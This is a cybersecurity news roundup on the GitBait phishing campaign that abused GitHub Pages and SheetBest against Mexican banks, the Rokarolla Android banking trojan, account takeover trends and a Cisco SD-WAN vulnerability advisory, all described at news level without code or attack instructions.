Serverless Phishing, Android Trojan, and Cisco Bugs Mark a Busy Week in Cyber Threats

A long-running phishing operation dubbed GitBait has abused GitHub Pages and a legitimate data service called SheetBest to steal banking credentials from customers of at least 12 Mexican financial institutions, according to new analysis from Group-IB. The campaign, which ran for roughly three years without its own server infrastructure, hosted fake bank pages on GitHub Pages and funneled stolen logins through SheetBest, which writes data directly into Google Sheets.

Group-IB identified more than 100 GitHub-hosted domains tied to the campaign, each serving several phishing pages. The modular kit included a desktop and mobile operator panel that let attackers pick a target bank and generate a matching fake page. Commit records on one repository showed 66 commits, indicating active development, with three contributor accounts sharing an email address and automated publishing via Jekyll and GitHub Actions.

Android Trojan Rokarolla Targets 217 Banking and Crypto Apps

Separately, researchers at Zimperium discovered a new Android banking trojan named Rokarolla that targets 217 banking and cryptocurrency applications and can execute 137 distinct commands on infected devices. The malware is primarily distributed through malicious websites that impersonate popular apps such as TikTok and Google Chrome.

• Rokarolla is named after its command-and-control infrastructure, according to Zimperium.
• The trojan enables device takeover capabilities, allowing attackers to perform actions including intercepting SMS messages and initiating fraudulent transactions.
• It requests accessibility service permissions to overlay fake login screens and capture credentials.
• Affected applications span multiple countries and include major banks and crypto exchanges.
• Zimperium recommends users avoid sideloading apps and verify app permissions carefully.

Account Takeover Threats and Cisco SD-WAN Vulnerabilities

Account takeovers are on the rise as attackers bypass traditional defenses through phishing, session hijacking, and MFA fatigue attacks, Specops Software warned in a recent analysis. The firm recommends device trust and continuous verification to reduce risk, rather than relying solely on username and password authentication.

Cisco also updated a max-severity security advisory to include an additional SD-WAN device model. The vulnerability, which affects Cisco SD-WAN vEdge routers, could allow an unauthenticated attacker to execute arbitrary code on affected devices. Cisco urged customers to review their devices and apply available patches. These developments underscore a growing trend where attackers increasingly rely on trusted cloud services and commodity malware kits rather than custom infrastructure, making detection harder for traditional blocklists.